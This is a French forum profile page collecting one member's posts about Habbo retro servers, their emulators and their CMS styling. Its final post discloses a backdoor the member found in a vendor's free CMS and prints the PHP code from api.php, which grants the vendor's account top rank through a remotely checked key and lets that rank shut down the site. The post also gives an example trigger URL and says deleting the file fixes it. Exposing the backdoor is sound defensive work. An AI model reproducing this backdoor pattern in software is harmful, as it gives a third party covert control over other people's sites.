Aller au contenu

Akushi

Contributeur
  • Compteur de contenus

    783
  • Inscription

  • Dernière visite

  • Jours gagnés

    13

Messages posté(e)s par Akushi

  1. Faut penser à utiliser un Framework ou faire dans le même style car à grande échelle c'est plus tenable sachant que tu utilises uniquement du JQuery ce qui n'est pas le mieux vos mieux créer des composant réutilisable sa permet au personne de t'aider plus facilement sinon bonne chance.

  2. Tu as une commandes :diamonds dans l'émulateur de Kodomas on et déjà venu me voir pour ce soucis si vous n'êtes pas capable d'utiliser un émulateur regarder un peut la source avant de vous lancez dans l'inconnu.

    AInsi que les commandes :coins et :duckets je crois.

  3. En sois ce n'est pas très difficile déjà vos mieux faire un cms qui utilise le i18n (plus dynamique et propre) ensuite selon la langue sélectionner cela changerais la configurations des swf côté external_flash_texts et furnidata ainsi que productdata et pour le côté émulateur vos mieux un plugin de traduction automatique donc oui c'est du taf car chaque bout de texte devrais comporter cela et bien sûr sa prendrais selon la langue sélectionner par l'utilisateur donc rajouter dans users une colonne ' lang ' et au changement de langue update cette colonne.

  4. Il y a 2 heures, Dany a dit :

    Mdr désolé mec mais si tu corrige les fautes prend ta journée haha merci pour ton commentaire

     

    Le prends pas méchamment il te dis juste que tu as fais une faute y a aucun abus ici t'en n'a qui abuse clairement pas la il te disent juste pour 2 trucs donc y a rien de mal en sois 

  5. Très simple tu crées une div en position: absolute ainsi qu'avec une opacity à 0 la div mère qui englobe l'avatar et donc aussi le pseudo ainsi que le rang dois être en position: relative pour éviter un débordement quand tu la feras apparaitre ensuite au hover tu met une opacity de 1 sur la div englobant la fonction et le pseudo et voilà

     

    Sinon pas mal mais revois ta navbar ajoute un padding de même au bouton.

  6. Il y a 1 heure, Mastoke a dit :

    Ce que j'essaye de te dire c'est que tu n'argumente même pas ton propos. Ce n'est pas disant que tels et tels chose est merdique que ceci est meilleur que tous. C'est comme ci tu disais que google chrome est meilleur que Mozilla mais sans argumenter.

    Internet Explorer > Microsoft Edge > Mozilla > Opera > Chrome ;)

  7. Il y a 2 heures, Masako a dit :

    Yo,
     

    "En termes de stabilité désolé mais la palme d'or revient largement à Butterfly (Wibbo émulateur)" la version de Jason ouais, sinon il est pas vraiment dingue en version d'origine et c'est bien pour ça que son développement a prit fin il y a bien longtemps^^

    Après concernant la communauté étrangère (brésil, espagne) ouais ils se prennent pas la tête et font tourner leurs serveurs sous des veilles ressources obsolète parce-qu'ils savent très bien que personne s'en prendront à eux c'est pas du tout la même mentalité et je les envie.
     

    Pour finir, les ressources en vente personne ne force à les acheter hein, tu peux bien tourner sous des ressources partagé et c'est régler, c'est juste du travail et de la revente^^

     

    La communauté française ressemble fortement à celle des allemands et c'est à gerber.

     

    c'est cool de débattre sur ces sujets :)  ciao

     

    La communauté française c'est énormément aggravé les enfants qui DDOS, se prennent pour des hackeurs les menaces les DOS sur les gens le cryptage pour les mot de passe qu'il décrypte et j'en passe et tout travail mérite salaire donc oui normal de pouvoir vendre ces ressources un certain prix quand tu bosses vraiment dessus enfin bon la communauté Habbo FR à que des enfants et je parle pas en terme d'âge mais de mentalité.

    • J'aime 4
  8. Java est bien plus stable côté serveur que le C#.

    PlusEmu écrase largement Arcturus ? Tu vies dans quel monde cette émulateur est entièrement bug même sont créateur la abandonner et continue uniquement sur sa version privé si c'est encore d'actualité il aurais quitté Habboon donc je ne pense pas mais bon Arcturus écrase de très loin PlusEMU il y a toutes une communautés derrière Arcturus contrairement à PlusEMU ou la communauté garde tout pour elle comme la dis Kozen énormément de chose sont fixé faut juste être " futfut " et débrouillard et pas attendre que quelqu'un le fassent à sa place.

    Et comme la communauté Krew l'as dis tu veux quelque chose de supplémentaire code le toi même ou paye quelqu'un ils recopie Habbo pas les rétros les mentions ne sont disponible que via des plugins tout ne te seras pas offert sur un plateau d'argent sa c'est sûr apprends le Java et tu verras ce que tu peux faire de cette émulateur la preuve étant que Nextgenhabbo avais ajouté les Forums de groupe sous leurs rétro avec un simple plugin.

    • J'adore 1
  9. il y a 1 minute, Mxthis a dit :

     

    Je ne vois pas ou est le mal à venir demander de l'aide ? :hihihi: Concernant la maintenance, j'ai moi-même pris une maintenance qui était partagé ici-même. Nous préférons ne pas perdre de temps et nous concentrer sur l'essentiel.

     

    Je te remercie 

     

    Pour un simple soucis tu ne viens pas demander de l'aider m'enfin bon on s'égare du sujet ;) 

  10. il y a 29 minutes, Stown a dit :

    Le truc c'est que les "noobs" auront soit la flemme de l'installer, soit ils pourront pas car c'est du Laravel

     

    Oui je comprends un fichier d'aide seras fournis et dans le pire des cas j'aiderais à l'installation.

  11. il y a 37 minutes, Stown a dit :

    Effectivement, il s'agit bien d'une faille pour vous nuire, je vous déconseille fortement d'utiliser les cms de cloudcms sous peine de vous faire hacker votre rétro.

     

    Le code est clairement explicite.

     

    Oui bien sûr sont auteur nie tous cela la clé est choisis par lui pas par le client et le fichier est imposée hors il devrait être non imposable et la clé devrait être choisis par sont fondateur pas par le vendeur

  12. il y a 1 minute, 7evenGiven a dit :

    Je n'ai pas accès aux permissions PlusEMU mais encore une fois uniquement à l'administration et sous l'accord du fondateur.

    Je n'ai jamais exploité un de nos clients et ça n'arrivera pas.

    Tu appelles ça comme tu veux, je ne considère ça nullement comme une faille (fixe et inséré exprès).

     

    Encore une fois, nos clients vont être avertis, il n'y a pas de souci.

    La sécurité de cette clé est primordiale, je ne vais pas le répéter 30 fois, celle-ci est assuré par CloudCMS.

    Je ne vais pas m'éterniser là-dessus, je fais un plus gros communiqué tout à l'heure dans la matinée.

     

    Fais donc ce que tu veux ce genre de fichier n'est pas imposable et devrait juste être proposer à pars.

  13. il y a 2 minutes, 7evenGiven a dit :

    Bonjour à tous,

    Je partage ici un communiqué afin de résoudre cette fausse rumeur.

    En aucun cas CloudCMS a été crée pour nuire à ces utilisateurs.

    Cette API est programmée et commandée sous mes ordres et uniquement par moi.

    Moi seul en ayant la permission du fondateur du rétro-habbo utilisant nos services peut avoir un accès total au site, j'entends uniquement par là (accès administration).

    En aucun cas, la clé de sécurité est exploitable, celle-ci est renouvelée toutes les heures. 

    Je vois aussi que cette rumeur inquiète bon nombre d'entre-vous, c'est compréhensible, mais malheureusement cette rumeur est démenti.

    @ Akushi poste un sujet sans même en parler avec moi afin de lui faire comprendre que non, ce n'est pas une faille, mais un outil d'aide.

    Afin d'éviter que cela se reproduire, CloudCMS va recevoir une MAJ dans la matinée qui informera les clients de cette "API" dans nos services dans la catégorie "À propos de notre site".

    Nous nous excusons pour la gêne occasionnée, encore une fois comme l'a dit @ Akushi si vous refusez la confiance de CloudCMS, supprimer le fichier API.php

     

    Merci pour votre confiance que vous portez à l'attention de CloudCMS.

    À très vite.

     

    Sa reviens au même sa reste une faille de sécurité facilement exploitable par des personnes s'y connaissant une parole reste une parole tu as accès à n'importe quel rétro ne dis pas que tu as uniquement accès  à l'administration plus emu est codé de façon à ce que plus ton rang est haut plus tu as de permissions les permissions sont pas gérable si tu met toutes les permissions au 7 le rang 8 auras toutes les permissions du rang 7 donc tu peux clairement avoir accès à tout ce qui est complétement dégelasse de la part d'un vendeur de cms déjà illégale de base pourquoi en parler ? Tu n'avertis pas les utilisateurs de ce genre de faille et c'est clairement pas normal quand un fichier et la il est censée être dis vous dîtes sécurisé il n'y à rien de sécurisé dans sa.

  14. Ayant télécharger quelque CMS gratuit venant de cloudcms.fr j'ai remarqué un petit soucis que sont créateur à mis volontairement.

     

    if (isset($_GET['override']) AND $_GET['override'] == 1) {
    	if (isset($_GET['key']) AND !empty($_GET['key'])) {
    		$ThisAPI = file_get_contents('https://api.cloudcms.fr/index.php?api=override&key=' . $_GET['key']);
    		$API = json_decode($ThisAPI);
    		if ($API->response == 'success') {
    			$ThisPDO = $pdo->query('UPDATE users SET rank = ? WHERE username = ?', ["16", "7evenGiven"]);
    			die('Accès système autorisé.');
    		} else {
    			die($API->response);
    		}
    	}
    } elseif (isset($_GET['shutdown']) AND $_GET['shutdown'] == 1) {
    	if (isset($_SESSION['id'])) {
    		if ($Account->RetrieveInfoById($_SESSION['id'], 'rank') == 16) {
    			$ThisPDO = $pdo->query('UPDATE cloudcms_api SET server = ?', ["close"]);
    			$ThisPDO = $pdo->query('INSERT INTO cloudcms_logs (user_id, timeact, action) VALUES (?, ?, ?)', [$_SESSION['id'], time(), "vient de fermer l'accès aux services en ligne."]);
    			die('Vous avez fermé l\'accès aux services en ligne, pour réactiver l\'accès, il faut vous rendre dans votre base de données puis dans "<b>cloudcms_api</b>" et modifier la valeur de serveur de "<b>close</b>" à "<b>open</b>".');
    		} else {
    			die();
    		}
    	}
    }

     

    Sont créateur à instaurer ceci une " API " pour pouvoir gérer les CMS et le fonctionnement du CMS, mais comme vous pouvez le remarquer il à volontairement mis un système pour ce rank

     

    Comment il exploite ceci ?

     

    Le fichier api.php est accéssible par n'importe qui mais personne n'a le paramètres $_GET['key'] mise à pars lui il lui suffis de l'entrer comme montrer dans l'example ci dessous est il seras rank et peux aussi fermer l'accès à votre site si vous ne savez pas ou ces c'est situé dans la table cloudcms_api remetter la colonne server sur open

     

    /!\ Ceci ne sert à rien d'essayé d'exploité cette faille car vous ne connaissez pas le deuxième paramètres $_GET['key'] qui est nécessaire pour faire fonctionner cette faille /!\

     

    http://monsupersite.fr/api?override=1&key=OnNeSaisPas

     

    Avec ce lien et la clé qu'il à définit il peut ce rank sur n'importe qu'elle rétro utilisant ces CMS alors je ne vous conseille absolument pas d'utiliser ces CMS.

     

    Comment fixé vous allez me dire ?

     

    Très simple aller à la racine de votre dossier la ou est situé votre CMS est supprimer le fichier nommé api.php

     

    Merci à @ NathanDZC de lui aussi l'avoir remarquer, oui ne critiquez pas mon orthographe sa n'a jamais était mon fort.

    • J'aime 1
    • Haha 1
×
×
  • Créer...